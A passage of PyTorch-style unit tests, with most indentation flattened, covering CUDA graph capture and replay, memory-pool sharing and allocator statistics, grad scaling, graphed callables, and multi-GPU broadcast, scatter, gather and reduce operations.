c = a.clone()
for _ in range(2):
c = func_with_temps(c, 3)
g0.replay()
for _ in range(2):
c = func_with_temps(c, 3)
g1.replay()
for _ in range(2):
c = func_with_temps(c, 3)
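            # Where the expected sums come from: func_with_temps maps t -> 2*t + 2*val per element.
            # b starts at 1 and receives 10 applications with val=1 (5 from g0.replay(), 5 from
            # g1.replay()): 1 -> 4 -> 10 -> 22 -> 46 -> 94 -> 190 -> 382 -> 766 -> 1534 -> 3070.
            # c starts at 1 and receives 6 eager applications with val=3:
            # 1 -> 8 -> 22 -> 50 -> 106 -> 218 -> 442.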
self.assertEqual(b.sum().item(), size * 3070)
self.assertEqual(c.sum().item(), size * 442)
if share_mem != "Don't share":
self.assertEqual(reserved_no_sharing - torch.cuda.memory_stats()["reserved_bytes.all.current"],
kSmallBuffer)
else:
reserved_no_sharing = torch.cuda.memory_stats()["reserved_bytes.all.current"]
del a, b, c, g0, g1
# Tensors used across streams (a and b) were held until just now, so no need to call record_stream on them.
torch.cuda.synchronize()
torch.cuda.empty_cache()
@unittest.skip("Temporarily disabled due to a graphs bug in libcuda.so, " +
"see https://github.com/pytorch/pytorch/pull/57556")
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_concurrent_replay(self):
torch.cuda.empty_cache()
size = 1000000 # largeish to help expose race conditions
def func_with_temps(t, val):
x = t.clone() + val
y = t.clone() + val
return x + y
s = torch.cuda.Stream()
for share_mem in ("Don't share", "via pool()", "via graph_pool_handle()"):
g0 = torch.cuda.CUDAGraph()
g1 = torch.cuda.CUDAGraph()
s0 = torch.cuda.Stream()
s1 = torch.cuda.Stream()
a = torch.ones((size,), device="cuda")
s.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(s):
g0_args = (torch.cuda.graph_pool_handle(),) if share_mem == "via graph_pool_handle()" else ()
g0.capture_begin(*g0_args)
b = a.clone()
for _ in range(5):
b = func_with_temps(b, 1)
g0.capture_end()
g1_args = (g0.pool(),) if share_mem == "via pool()" else g0_args
g1.capture_begin(*g1_args)
c = a.clone()
for _ in range(5):
c = func_with_temps(c, 2)
g1.capture_end()
# To reproduce data corruption, I need g0 and g1's kernels to run concurrently.
# But replay() (especially cudaGraphLaunch) can incur significant CPU overhead.
# The following pattern helps align device-side execution of g0 and g1's kernels.
torch.cuda.synchronize()
with torch.cuda.stream(s0):
torch.cuda._sleep(1000000)
s1.wait_stream(s0)
g0.replay()
with torch.cuda.stream(s1):
g1.replay()
torch.cuda.current_stream().wait_stream(s0)
torch.cuda.current_stream().wait_stream(s1)
if share_mem != "Don't share":
# Confirms concurrent replays using the same mempool corrupted each other.
self.assertNotEqual(b.sum().item(), size * 94)
self.assertNotEqual(c.sum().item(), size * 156)
else:
# Confirms concurrent replays using different mempools did not corrupt each other.
self.assertEqual(b.sum().item(), size * 94)
self.assertEqual(c.sum().item(), size * 156)
del a, b, c, g0, g1
# Tensors used across streams (a, b, c) were held until just now, so no need to call record_stream on them.
torch.cuda.synchronize()
torch.cuda.empty_cache()
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_three_successive(self):
torch.cuda.empty_cache()
size = 1000
s = torch.cuda.Stream()
for share_mem in ("Don't share", "via pool()", "via graph_pool_handle()"):
a = torch.ones((size,), device="cuda")
g0 = torch.cuda.CUDAGraph()
g1 = torch.cuda.CUDAGraph()
g2 = torch.cuda.CUDAGraph()
s.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(s):
g0_args = (torch.cuda.graph_pool_handle(),) if share_mem == "via graph_pool_handle()" else ()
g0.capture_begin(*g0_args)
b = a.clone()
c = b + 1
d = b + 2
g0.capture_end()
args = (g0.pool(),) if share_mem == "via pool()" else g0_args
g1.capture_begin(*args)
e = c + 3
del c
g1.capture_end()
g2.capture_begin(*args)
f = d + 4
g2.capture_end()
torch.cuda.current_stream().wait_stream(s)
# Tests that replaying in capture order is valid
g0.replay()
g1.replay()
g2.replay()
self.assertEqual(e.sum().item(), size * 5)
self.assertEqual(f.sum().item(), size * 7)
# Tests that replaying as g0, g2, g1 is only valid if they don't share a pool
g0.replay()
g2.replay()
g1.replay()
# If share_mem is True, g2's capture should have reused c's memory for f. We replayed g2 then g1,
# so we expect g1's captured "e = c + 3" mistakenly filled e with "f's vals + 3".
self.assertEqual(e.sum().item(), size * (7 + 3) if share_mem != "Don't share" else size * 5)
self.assertEqual(f.sum().item(), size * 7)
del a, b, d, e, f, g0, g1, g2
# Tensors used across streams (a, e, f) were held until just now, so no need to call record_stream on them.
torch.cuda.synchronize()
torch.cuda.empty_cache()
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_memory_stats_and_use_result_after_destroy_graph(self):
kSmallSize = 1048576
kSmallBuffer = 2097152
kLargeBuffer = 20971520
kMinLargeAlloc = 10485760
kRoundLarge = 2097152
elem = 4
# this was annoying to write but stresses the expectations pretty rigorously
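        # Each case is (numel, delta_cudaMallocs, delta_cudaMalloc_bytes,
        # delta_cudaMalloc_bytes_post_del_g, pool_string): the tensor size, the expected
        # capture-time growth in allocator segments and reserved bytes, the reserved bytes
        # expected to remain once the graph is deleted but its output tensor survives, and
        # the pool ("small_pool" or "large_pool") being exercised. Names match the loop
        # unpacking below.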
cases = ((512 // elem, 1, kSmallBuffer, kSmallBuffer, "small_pool"),
(kSmallSize // elem, 2, 2 * kSmallBuffer, kSmallBuffer, "small_pool"),
((kSmallSize + 512) // elem, 1, kLargeBuffer, kLargeBuffer, "large_pool"),
((kMinLargeAlloc - 512) // elem, 2, 2 * kLargeBuffer, kLargeBuffer, "large_pool"),
((kMinLargeAlloc + 512) // elem, 3,
3 * (kRoundLarge * ((kMinLargeAlloc + 512 + kRoundLarge - 1) // kRoundLarge)),
kRoundLarge * ((kMinLargeAlloc + 512 + kRoundLarge - 1) // kRoundLarge),
"large_pool"),)
stats_to_check = ("segment.",
"reserved_bytes.",
"active.",
"active_bytes.")
gc.collect()
torch.cuda.empty_cache()
s = torch.cuda.Stream()
for (numel,
delta_cudaMallocs,
delta_cudaMalloc_bytes,
delta_cudaMalloc_bytes_post_del_g,
pool_string) in cases:
if pool_string == "small_pool":
delta_active_blocks = 2 # one from "b" plus a sneaky one from CUDAGraph's one-element rng offset holder
delta_active_bytes = numel * elem + 512 # + 512 for CUDAGraph's rng offset holder
else:
delta_active_blocks = 1 # We only check the large pool, which isn't affected by rng offset holder
delta_active_bytes = numel * elem
g = torch.cuda.CUDAGraph()
s.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(s):
# Allocation stat estimates assume input is created on the same stream as capture_begin()
# (in other words, the same stream silo as the rng offset holder, which is not allocated from the
# capture's private pool).
a = torch.ones((numel,), device="cuda")
precapture_stats = torch.cuda.memory_stats()
g.capture_begin()
b = a.clone()
for _ in range(5):
b = b.clone() + 1
g.capture_end()
torch.cuda.current_stream().wait_stream(s)
gc.collect()
postcapture_stats = torch.cuda.memory_stats()
expecteds = (delta_cudaMallocs,
delta_cudaMalloc_bytes,
delta_active_blocks,
delta_active_bytes)
# Double checks replay and stats before and after a call to empty_cache
for i in range(2):
for stat, expected in zip(stats_to_check, expecteds):
stat = stat + pool_string + ".current"
current = postcapture_stats[stat] - precapture_stats[stat]
self.assertEqual(current, expected, "Pre to post capture delta of " +
stat + " = {}, expected = {}, numel = {}".format(current, expected, numel))
g.replay()
self.assertEqual(b.sum().item(), 6 * numel)
if i == 0:
torch.cuda.empty_cache()
del g
gc.collect()
torch.cuda.empty_cache()
postdel_stats = torch.cuda.memory_stats()
# Uses graph result b after graph has been deleted
self.assertEqual(b.sum().item(), 6 * numel)
# b should be the only live reference remaining from the graph's private pool
expecteds = (1, delta_cudaMalloc_bytes_post_del_g, 1, numel * elem)
for stat, expected in zip(stats_to_check, expecteds):
stat = stat + pool_string + ".current"
current = postdel_stats[stat] - precapture_stats[stat]
self.assertEqual(current, expected, "Pre capture to post graph delete delta of " +
stat + " = {}, expected = {}, numel = {}".format(current, expected, numel))
# del a, b before the next case is essential, otherwise overwriting a and b in the next case
# can throw off its allocation/deallocation counts.
del a, b
# Tensors used across streams (a and b) were held until just now, so no need to call record_stream on them.
torch.cuda.synchronize()
torch.cuda.empty_cache()
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_record_stream(self):
# Makes sure graph capture defers attempting to reclaim allocations used across streams. See
# "Q. Why skip process_events if a capture might be underway?" in c10/cuda/CUDACachingAllocator.cpp
torch.cuda.empty_cache()
potential_problem = torch.zeros((3,), device="cuda")
a = torch.zeros((3,), device="cuda")
s0 = torch.cuda.Stream()
s1 = torch.cuda.Stream()
s2 = torch.cuda.Stream()
g = torch.cuda.CUDAGraph()
torch.cuda.synchronize()
with torch.cuda.stream(s0):
potential_problem.record_stream(s0)
torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES)
potential_problem.fill_(1.)
del potential_problem
with torch.cuda.stream(s1):
g.capture_begin()
# potential_problem's allocation should still be outstanding. if DeviceCachingAllocator::malloc
# mistakenly calls process_events, it will trigger cudaEventQueries on potential_problem's end-of-life
# event, which will cause the capture to error.
b = a.clone()
# Let's also see what happens if we record_stream on a tensor during capture.
s2.wait_stream(s1)
with torch.cuda.stream(s2):
b.fill_(1.)
b.record_stream(s2) # dummy record_stream
del b
s1.wait_stream(s2)
g.capture_end()
torch.cuda.synchronize()
        # A dummy allocation triggers process_events, which should successfully process b's end-of-life event.
c = torch.zeros((3,), device="cuda")
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
# If this test is the first in the process to try cudnn rnns with dropout, it'll initialize
# DropoutState's long-lived internal buffer. Calling code perceives this (correct) behavior
# as a memory leak unless we skip the leak check.
@skipCUDAMemoryLeakCheckIf(True)
def test_graph_cudnn_dropout(self):
# Tests the interaction of cuda graph capture with DropoutState's syncs in ATen/native/cudnn/RNN.cpp.
# In particular, if user runs a sequence of captured and noncaptured cudnn rnns, DropoutState should
# avoid syncing noncapturing streams with captured events or vice versa.
torch.cuda.empty_cache()
model = torch.nn.LSTM(512, 512, 2, dropout=0.5).cuda()
x = torch.ones(100, 192, 512, device="cuda")
y = model(x)
g = torch.cuda.CUDAGraph()
s = torch.cuda.Stream()
s.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(s):
g.capture_begin()
y = model(x)
g.capture_end()
torch.cuda.current_stream().wait_stream(s)
y = model(x)
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_grad_scaling(self):
torch.cuda.empty_cache()
scaler = torch.cuda.amp.GradScaler(init_scale=4.)
g = torch.cuda.CUDAGraph()
s = torch.cuda.Stream()
weight = torch.ones((100,), device="cuda", requires_grad=True)
opt = torch.optim.SGD([weight], lr=0.1)
static_input = torch.ones_like(weight)
static_grad = torch.ones_like(weight)
# warmup
s = torch.cuda.Stream()
s.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(s):
loss = (weight.half() * static_input).sum()
scaler.scale(loss).backward()
torch.cuda.current_stream().wait_stream(s)
opt.zero_grad(set_to_none=True)
# capture
with torch.cuda.graph(g):
loss = (weight.half() * static_input).sum()
scaler.scale(loss).backward()
input_vals = [5, 20000, 5, 40000]
# If the scale gets updated properly, these are the scale, growth tracker,
# and grad values we expect.
expected_scales = [4, 2, 2, 1]
expected_growth_trackers = [1, 0, 1, 0]
expected_grad_vals = [5 * 4, float("inf"), 5 * 2, float("inf")]
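        # Where these expectations come from: each replay produces, per element, roughly
        # grad = static_input * scale in FP16. Iteration 1: 5 * 4 = 20 is finite, so the
        # growth tracker ticks to 1 and the scale stays 4. Iteration 2: 20000 * 4 = 80000
        # overflows FP16 (max ~65504), giving inf grads, so update() halves the scale to 2
        # and resets the tracker. Iterations 3 and 4 repeat the pattern at scale 2,
        # finishing at scale 1.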
for data, scale, growth_tracker, grad_val in zip(input_vals,
expected_scales,
expected_growth_trackers,
expected_grad_vals):
static_input.fill_(data)
g.replay()
self.assertEqual(weight.grad, torch.full_like(weight.grad, grad_val))
scaler.step(opt)
scaler.update()
self.assertEqual(scaler._scale, scale)
self.assertEqual(scaler._growth_tracker, growth_tracker)
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_make_graphed_callables(self):
torch.manual_seed(5)
torch.cuda.manual_seed(5)
N, D_in, H, D_out = 640, 4096, 2048, 1024
models = []
for _ in range(2):
model_section1 = torch.nn.Sequential(torch.nn.Linear(D_in, H),
torch.nn.Dropout(p=0.1)).cuda()
model_section2 = torch.nn.Sequential(torch.nn.Linear(H, D_out),
torch.nn.Dropout(p=0.2)).cuda()
models.append(torch.nn.Sequential(model_section1, model_section2))
model_graphed = models[0]
model_control = models[1]
model_graphed.load_state_dict(model_control.state_dict())
opt_graphed = torch.optim.SGD(model_graphed.parameters(), lr=0.1)
opt_control = torch.optim.SGD(model_control.parameters(), lr=0.1)
x = torch.randn(N, D_in, device='cuda')
h = torch.randn(N, H, device='cuda', requires_grad=True)
y_pred = torch.randn(N, D_out, device='cuda', requires_grad=True)
y = torch.randn(N, D_out, device='cuda')
loss_fn_control = torch.nn.functional.mse_loss
relu_control = torch.nn.functional.relu
# This is a good stress test. It graphs four callables: two Modules and two python functions.
model_graphed[0], model_graphed[1], relu_graphed, loss_fn_graphed = \
torch.cuda.make_graphed_callables((model_graphed[0], model_graphed[1], relu_control, loss_fn_control),
((x,), (h,), (y_pred,), (y_pred, y)))
real_inputs = [torch.rand_like(x) for _ in range(10)]
real_targets = [torch.rand_like(y) for _ in range(10)]
for m, opt, relu, loss_fn in zip((model_graphed, model_control),
(opt_graphed, opt_control),
(relu_graphed, relu_control),
(loss_fn_graphed, loss_fn_control)):
            # Resets RNG states before iterations for graphed and ungraphed models,
# so dropout math should be bitwise identical for both.
torch.manual_seed(5)
torch.cuda.manual_seed(5)
for data, target in zip(real_inputs, real_targets):
opt.zero_grad(set_to_none=True)
y_pred = m(data)
y_pred = relu(y_pred)
loss = loss_fn(y_pred, target)
loss.backward()
opt.step()
for p, pc in zip(model_graphed.parameters(), model_control.parameters()):
self.assertEqual(p, pc)
# We graphed the models in training mode. Eval should still run ungraphed.
model_graphed.eval()
model_control.eval()
self.assertEqual(model_graphed(real_inputs[0]), model_control(real_inputs[0]))
def test_batch_norm_gather_stats(self):
input = torch.randn(1, 3, 3, 3, device='cuda')
mean, invstd = torch.batch_norm_gather_stats(
input, mean=torch.ones(2, 3, device='cuda'), invstd=torch.ones(2, 3, device='cuda'),
running_mean=None, running_var=None , momentum=.1, eps=1e-5, count=2
)
self.assertEqual(mean, torch.ones(3, device='cuda'))
self.assertEqual(invstd, torch.ones(3, device='cuda'))
@unittest.skipIf(not TEST_MULTIGPU, "Test needs multiple GPUs")
def test_cuda_device_memory_allocated(self):
from torch.cuda import memory_allocated
device_count = torch.cuda.device_count()
current_alloc = [memory_allocated(idx) for idx in range(device_count)]
x = torch.ones(10, device="cuda:0")
self.assertTrue(memory_allocated(0) > current_alloc[0])
self.assertTrue(all(memory_allocated(torch.cuda.device(idx)) == current_alloc[idx] for idx in range(1, device_count)))
def test_matmul_memory_use(self):
def get_max_used():
torch.cuda.synchronize()
val = torch.cuda.max_memory_allocated()
torch.cuda.reset_peak_memory_stats()
return val
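        # The assertions below check that matmul against an expand()ed (broadcast) batch
        # input reaches the same peak memory as the unexpanded matmul and as an explicit
        # bmm, i.e. the broadcast input is not materialized.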
a = torch.rand(1, 32, 32, device="cuda")
b = torch.rand(24, 32, 1, device="cuda")
get_max_used()
torch.matmul(a, b)
matmul_mem = get_max_used()
a = a.expand(24, 32, 32)
torch.matmul(a, b)
matmul_expand_mem = get_max_used()
torch.bmm(a, b)
bmm_mem = get_max_used()
self.assertEqual(matmul_expand_mem, matmul_mem)
self.assertEqual(bmm_mem, matmul_mem)
class TestCudaComm(TestCase):
def _test_broadcast(self, input):
if not TEST_MULTIGPU:
raise unittest.SkipTest("only one GPU detected")
# test regular
results = comm.broadcast(input, (0, 1))
for i, t in enumerate(results):
self.assertEqual(t.get_device(), i)
self.assertEqual(t, input)
if input.is_cuda and input.get_device() == i: # test not copying on same device
self.assertEqual(t.data_ptr(), input.data_ptr())
# test out=
for inplace in [True, False]:
if inplace:
outputs = [torch.empty_like(input, device=0), torch.empty_like(input, device=1)]
else:
outputs = [input.cuda(0), torch.empty_like(input, device=1)]
results = comm.broadcast(input, out=outputs)
for r, o in zip(results, outputs):
self.assertIs(r, o)
for i, t in enumerate(results):
self.assertEqual(t.get_device(), i)
self.assertEqual(t, input)
# test error msg
with self.assertRaisesRegex(RuntimeError, r"Exactly one of 'devices' and 'out'"):
comm.broadcast(input, (0, 1), out=outputs)
with self.assertRaisesRegex(RuntimeError,
r"Expected all output tensors to be CUDA tensors, but output tensor at index 1"):
comm.broadcast(input, out=[input.cuda(0), input.cpu()])
with self.assertRaisesRegex(RuntimeError,
r"Expected all output tensors to have same shape as the source .+ at index 1"):
comm.broadcast(input, out=[input.cuda(0), input.cuda(1).unsqueeze(0)])
def test_broadcast_cpu(self):
self._test_broadcast(torch.randn(5, 5))
def test_broadcast_gpu(self):
self._test_broadcast(torch.randn(5, 5).cuda())
def _test_broadcast_coalesced(self, tensors, buffer_size):
b_tensors = [comm.broadcast(t, (0, 1)) for t in tensors]
for (_, bt), t in zip(b_tensors, tensors):
self.assertEqual(bt.get_device(), 1)
self.assertEqual(bt, t)
self.assertIsInstance(bt, type(t))
bc_tensors = comm.broadcast_coalesced(tensors, (0, 1), buffer_size=buffer_size)
bc_tensors_t = list(zip(*bc_tensors))
self.assertEqual(b_tensors, bc_tensors_t)
for (_, bt), (_, bct) in zip(b_tensors, bc_tensors_t):
self.assertEqual(bt.get_device(), bct.get_device())
self.assertIsInstance(bct, type(bt))
# check that tensors on device[0] are returned as-is
for out_tensors in (b_tensors, bc_tensors_t):
for inp_t, (out_t, _) in zip(tensors, out_tensors):
self.assertIs(inp_t, out_t)
# check that the tensors not on device[0] have different version counters
# NOTE [ Version Counter in comm.*_coalesced ]
versions = [t._version for _, t in bc_tensors_t]
for old_version, (_, t) in zip(versions, bc_tensors_t):
self.assertEqual(t._version, old_version)
t.zero_()
self.assertEqual(t._version, old_version + 1)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
# Note: fails sometimes on the CI, passes on dual gfx906
def test_broadcast_coalesced(self):
numel = 5
num_bytes = numel * 8
tensors = [
make_sparse_tensor(torch.cuda.sparse.DoubleTensor, 1, 2, 3),
torch.randn(numel).long().cuda(),
torch.randn(numel).cuda(),
make_sparse_tensor(torch.cuda.sparse.DoubleTensor, 10, 2, 3),
make_sparse_tensor(torch.cuda.sparse.DoubleTensor, 5, 2, 3),
make_sparse_tensor(torch.cuda.sparse.LongTensor, 7, 3, 3),
make_sparse_tensor(torch.cuda.sparse.FloatTensor, 2, 2, 3),
torch.randn(numel).long().cuda(),
torch.randn(numel).long().cuda(),
make_sparse_tensor(torch.cuda.sparse.LongTensor, 3, 2, 7),
torch.randn(numel * 2).int().cuda(), # int is 2x shorter
torch.randn(numel).cuda(),
]
self._test_broadcast_coalesced(tensors, num_bytes * 5 // 2)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_broadcast_coalesced_dense_only(self):
numel = 5
num_bytes = numel * 8
tensors = [
torch.randn(numel).long().cuda(),
torch.randn(numel).cuda(),
torch.randn(numel).long().cuda(),
torch.randn(numel).long().cuda(),
torch.randn(numel * 2).int().cuda(), # int is 2x shorter
torch.randn(numel).cuda(),
]
self._test_broadcast_coalesced(tensors, num_bytes * 5 // 2)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_broadcast_coalesced_empty_tensors(self):
tensors = [
torch.tensor([]).byte().cuda(),
torch.randn(5).cuda(),
torch.randn(5).double().cuda()
]
self._test_broadcast_coalesced(tensors, 256)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_reduce_add(self):
x = torch.randn(5, 5)
y = torch.randn(5, 5)
x_cuda = x.cuda(0)
y_cuda = y.cuda(1)
result = comm.reduce_add((x_cuda, y_cuda))
self.assertEqual(result.get_device(), 0)
self.assertEqual(result.cpu(), x + y)
def _test_reduce_add_coalesced(self, tensors, buffer_size):
dup_tensors = [tensors, [t.cuda(1) for t in tensors]]
r_tensors = [comm.reduce_add(t) for t in zip(*dup_tensors)]
for r, t in zip(r_tensors, tensors):
self.assertEqualTypeString(r, t)
self.assertEqual(r, t * 2)
rc_tensors = comm.reduce_add_coalesced(dup_tensors, buffer_size=buffer_size)
self.assertEqual(r_tensors, rc_tensors)
for r, rc in zip(r_tensors, rc_tensors):
self.assertEqualTypeString(rc, r)
# Since we have both cuda:0 and cuda:1 inputs, the outputs must be new.
# We can check that they have different version counters.
# NOTE [ Version Counter in comm.*_coalesced ]
versions = [t._version for t in rc_tensors]
for old_version, t in zip(versions, rc_tensors):
self.assertEqual(t._version, old_version)
t.zero_()
self.assertEqual(t._version, old_version + 1)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_reduce_add_coalesced(self):
numel = 5
num_bytes = numel * 8
tensors = [
make_sparse_tensor(torch.cuda.sparse.DoubleTensor, 1, 2, 3),
torch.randn(numel).long().cuda(),
torch.randn(numel).cuda(),
make_sparse_tensor(torch.cuda.sparse.DoubleTensor, 10, 2, 3),
make_sparse_tensor(torch.cuda.sparse.DoubleTensor, 5, 2, 3),
make_sparse_tensor(torch.cuda.sparse.LongTensor, 7, 3, 3),
make_sparse_tensor(torch.cuda.sparse.FloatTensor, 2, 2, 3),
torch.randn(numel).long().cuda(),
torch.randn(numel).long().cuda(),
make_sparse_tensor(torch.cuda.sparse.LongTensor, 3, 2, 7),
torch.randn(numel * 2).int().cuda(), # int is 2x shorter
torch.randn(numel).cuda(),
]
self._test_reduce_add_coalesced(tensors, num_bytes * 5 // 2)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_reduce_add_coalesced_dense_only(self):
numel = 5
num_bytes = numel * 8
tensors = [
torch.randn(numel).long().cuda(),
torch.randn(numel).cuda(),
torch.randn(numel).long().cuda(),
torch.randn(numel).long().cuda(),
torch.randn(numel * 2).int().cuda(), # int is 2x shorter
torch.randn(numel).cuda(),
]
self._test_reduce_add_coalesced(tensors, num_bytes * 5 // 2)
def _test_scatter(self, input, chunk_sizes=None, dim=0):
if not TEST_MULTIGPU:
raise unittest.SkipTest("only one GPU detected")
if chunk_sizes is None:
ref_chunk_sizes = tuple(repeat(input.size(dim) // 2, 2))
else:
ref_chunk_sizes = chunk_sizes
# test regular
result = comm.scatter(input, (0, 1), chunk_sizes, dim)
self.assertEqual(len(result), 2)
chunk_start = 0
for i, r in enumerate(result):
chunk_end = chunk_start + ref_chunk_sizes[i]
index = [slice(None, None) for _ in range(input.dim())]
index[dim] = slice(chunk_start, chunk_end)
self.assertEqual(r, input[tuple(index)], atol=0, rtol=0)
chunk_start = chunk_end
if r.device == input.device:
self.assertEqual(r.data_ptr(), input.data_ptr()) # for target @ same device, a view should be returned
# test out
out = [torch.empty_like(t) for t in result]
result = comm.scatter(input, dim=dim, out=out)
self.assertEqual(len(result), 2)
chunk_start = 0
for i, r in enumerate(result):
self.assertIs(r, out[i])
chunk_end = chunk_start + ref_chunk_sizes[i]
index = [slice(None, None) for _ in range(input.dim())]
index[dim] = slice(chunk_start, chunk_end)
self.assertEqual(r, input[tuple(index)], atol=0, rtol=0)
chunk_start = chunk_end
# test error msg
if chunk_sizes is not None:
with self.assertRaisesRegex(RuntimeError, r"Expected devices and chunk_sizes to be of same length"):
comm.scatter(input, [0 for _ in range(len(chunk_sizes) + 1)], dim=dim, chunk_sizes=chunk_sizes)
with self.assertRaisesRegex(RuntimeError, r"'devices' must not be specified"):
comm.scatter(input, (0, 1), dim=dim, out=out)
with self.assertRaisesRegex(RuntimeError, r"Expected at least one device to scatter to"):
comm.scatter(input, (), dim=dim)
with self.assertRaisesRegex(RuntimeError, r"Expected at least one output tensor to scatter to"):
comm.scatter(input, dim=dim, out=[])
with self.assertRaisesRegex(RuntimeError,
r"Expected all output tensors to be CUDA tensors, but output tensor at index 0"):
comm.scatter(input, dim=dim, out=([out[0].cpu()] + out[1:]))
with self.assertRaisesRegex(RuntimeError, r"Output tensor at index 0 has incorrect shape"):
comm.scatter(input, dim=dim, out=([out[0].unsqueeze(0)] + out[1:]))
with self.assertRaisesRegex(RuntimeError, r"Total size for output tensors along scatter dim \d+ does not match"):
index = [slice(None, None) for _ in range(input.dim())]
index[dim] = slice(1, None)
comm.scatter(input, dim=dim, out=([out[0][tuple(index)]] + out[1:]))
def test_scatter_cpu(self):
self._test_scatter(torch.randn(4, 4), dim=0)
def test_scatter_cpu_dim(self):
self._test_scatter(torch.randn(4, 4), dim=1)
def test_scatter_cpu_neg_dim(self):
self._test_scatter(torch.randn(4, 4), dim=-2)
def test_scatter_cpu_sizes(self):
self._test_scatter(torch.randn(6, 4), chunk_sizes=(2, 4))
def test_scatter_gpu(self):
self._test_scatter(torch.randn(4, 4).cuda(), dim=0)
def test_scatter_gpu_dim(self):
self._test_scatter(torch.randn(4, 4).cuda(), dim=1)
def test_scatter_gpu_neg_dim(self):
self._test_scatter(torch.randn(4, 4).cuda(), dim=-2)
def test_scatter_gpu_sizes(self):
self._test_scatter(torch.randn(6, 4).cuda(), chunk_sizes=(2, 4))
def _test_gather(self, dim):
if not TEST_MULTIGPU:
raise unittest.SkipTest("only one GPU detected")
x = torch.randn(2, 5, device=0)
y = torch.randn(2, 5, device=1)
expected_size = list(x.size())
expected_size[dim] += y.size(dim)
expected_size = torch.Size(expected_size)
destinations = [None, torch.device('cuda:0'), torch.device('cpu')]
if torch.cuda.device_count() > 2:
destinations.append(torch.device('cuda:2'))
with torch.cuda.device(1):
for destination in destinations:
if destination is None:
expected_device = torch.device('cuda', torch.cuda.current_device())
else:
expected_device = destination
for use_out in [True, False]:
if use_out:
out = torch.empty(expected_size, device=expected_device)
result = comm.gather((x, y), dim, out=out)
self.assertIs(out, result)
else:
result = comm.gather((x, y), dim, destination=destination)
self.assertEqual(result.device, expected_device)
self.assertEqual(result.size(), expected_size)
index = [slice(None, None), slice(None, None)]
index[dim] = slice(0, x.size(dim))
self.assertEqual(result[tuple(index)], x)
index[dim] = slice(x.size(dim), x.size(dim) + y.size(dim))
self.assertEqual(result[tuple(index)], y)
# test error msg
with self.assertRaisesRegex(RuntimeError, r"'destination' must not be specified"):
comm.gather((x, y), dim, destination='cpu', out=torch.empty(expected_size, device='cpu'))
with self.assertRaisesRegex(RuntimeError, r"Expected at least one tensor to gather from"):
comm.gather(())
with self.assertRaisesRegex(RuntimeError, r"Expected all input tensors to be CUDA tensors, "):
comm.gather((x.cpu(), y))
with self.assertRaisesRegex(RuntimeError, r"Expected all input tensors to have the same number of dimensions"):
comm.gather((x, y.unsqueeze(0)))
with self.assertRaisesRegex(RuntimeError, r"Input tensor at index 1 has invalid shape"):
if dim in [0, -2]:
comm.gather((x, y[:, 1:]), dim=dim)
elif dim in [1, -1]:
comm.gather((x, y[1:, :]), dim=dim)
def test_gather(self):
self._test_gather(0)
def test_gather_dim(self):
self._test_gather(1)
def test_gather_neg_dim(self):
self._test_gather(-1)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_memory_format_scatter_gather(self):
nhwc = torch.randn((10, 3, 32, 32), device='cpu').contiguous(memory_format=torch.channels_last)
results = torch.cuda.comm.scatter(nhwc, (0, 1), None, 0)
for result in results:
self.assertFalse(result.is_contiguous())
self.assertTrue(result.is_contiguous(memory_format=torch.channels_last))
gathered = torch.cuda.comm.gather(results)
self.assertTrue(gathered.is_contiguous(memory_format=torch.channels_last))
def test_matmul_device_mismatch(self):
cpu = torch.rand((10, 10))
cuda = cpu.cuda()
with self.assertRaisesRegex(RuntimeError, "Expected all tensors to be on the same device"):
cpu @ cuda
with self.assertRaisesRegex(RuntimeError, "Expected all tensors to be on the same device"):
cuda @ cpu
for s, m1, m2 in product((cpu, cuda), repeat=3):
if s.device == m1.device == m2.device:
torch.addmm(s, m1, m2)
else:
with self.assertRaisesRegex(RuntimeError, "Expected all tensors to be on the same device"):
torch.addmm(s, m1, m2)
@unittest.skipIf(not TEST_MULTIGPU, "Test needs multiple GPUs")
def test_scatter_namedtuple(self):
# tests ability to scatter namedtuples and retrieve a list where each
# element is of the expected namedtuple type.
fields = ("a", "b")
TestNamedTupleInput_0 = collections.namedtuple("NamedTuple", fields)
num_gpus = torch.cuda.device_count()
a = torch.rand(num_gpus * 2, device=0)
b = torch.rand(num_gpus * 2, device=0)
a_tensors_for_gpu = [a[2 * i : 2 * i + 2].to(i) for i in range(num_gpus)]
b_tensors_for_gpu = [b[2 * i : 2 * i + 2].to(i) for i in range(num_gpus)]
inp = TestNamedTupleInput_0(a, b)
target_gpus = [torch.device(i) for i in range(num_gpus)]
scatter_out = scatter_gather.scatter(inp, target_gpus)
for i, x in enumerate(scatter_out):
self.assertTrue(isinstance(x, type(inp)))
self.assertEqual(x._fields, fields)
expected_a = a_tensors_for_gpu[i]
expected_b = b_tensors_for_gpu[i]
self.assertEqual(expected_a, x.a)
self.assertEqual(expected_b, x.b)
